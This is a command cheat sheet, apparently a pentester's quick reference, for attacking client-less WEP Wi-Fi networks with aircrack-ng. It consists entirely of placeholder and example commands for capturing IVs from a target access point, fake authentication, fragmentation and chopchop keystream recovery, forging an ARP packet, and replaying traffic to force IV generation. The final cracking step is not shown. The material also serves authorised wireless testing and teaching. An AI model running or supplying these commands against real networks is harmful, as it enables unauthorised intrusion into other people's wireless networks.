Clientless WEP
This is intended to be a quick reference; for more detailed information, please refer to the aircrack-ng documentation.
Setup
Monitor Mode 1
List available interfaces
sudo airmon-ng
pseudo
sudo airmon-ng start <interface> <channel>
example
sudo airmon-ng start wlan0 6
Packet Capture 2
pseudo
sudo airodump-ng --channel <channel_number> --bssid <AP_BSSID> -w <file> --ivs <interface>
example
sudo airodump-ng --channel 6 --bssid 00:AA:11:BB:22:CC -w test --ivs wlan0mon
Fake Authentication 3
pseudo
sudo aireplay-ng --fakeauth 20 -a <AP_BSSID> -h <source_BSSID> <interface>
example
sudo aireplay-ng --fakeauth 20 -a 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC wlan0mon
Fragmentation 4
pseudo
sudo aireplay-ng --fragment -a <AP_BSSID> -h <source_BSSID> <interface>
example
sudo aireplay-ng --fragment -a 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC wlan0mon
KoreK Chopchop 5
pseudo
sudo aireplay-ng --chopchop -b <AP_BSSID> -h <source_BSSID> <interface>
example
sudo aireplay-ng --chopchop -b 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC wlan0mon
Packet Forge 6
pseudo
packetforge-ng -0 -a <AP_BSSID> -h <source_BSSID> -k <AP_IPAddress> -l <source_IPAddress> -y <xor_file> -w <output_file>
example
packetforge-ng -0 -a 00:AA:11:BB:22:CC -h 11:AA:22:BB:33:CC -k 192.168.1.1 -l 192.168.1.2 -y replay_dec-1002-153255.xor -w arp-request
ARP replay 7
pseudo
sudo aireplay-ng --interactive -r <packet_file> <interface>
example
sudo aireplay-ng --interactive -r arp-request wlan0mon
Modified Packet Replay 8
pseudo
sudo aireplay-ng --interactive -b <AP_BSSID> -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 <interface>
example
sudo aireplay-ng --interactive -b 00:AA:11:BB:22:CC -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 wlan0mon
Footnotes
1 https://www.aircrack-ng.org/doku.php?id=airmon-ng
2 https://www.aircrack-ng.org/doku.php?id=airodump-ng
3 https://www.aircrack-ng.org/doku.php?id=fake_authentication
4 https://www.aircrack-ng.org/doku.php?id=fragmentation
5 https://www.aircrack-ng.org/doku.php?id=korek_chopchop
6 https://www.aircrack-ng.org/doku.php?id=packetforge-ng
7 https://www.aircrack-ng.org/doku.php?id=arp-request_reinjection
8 https://www.aircrack-ng.org/doku.php?id=interactive_packet_replay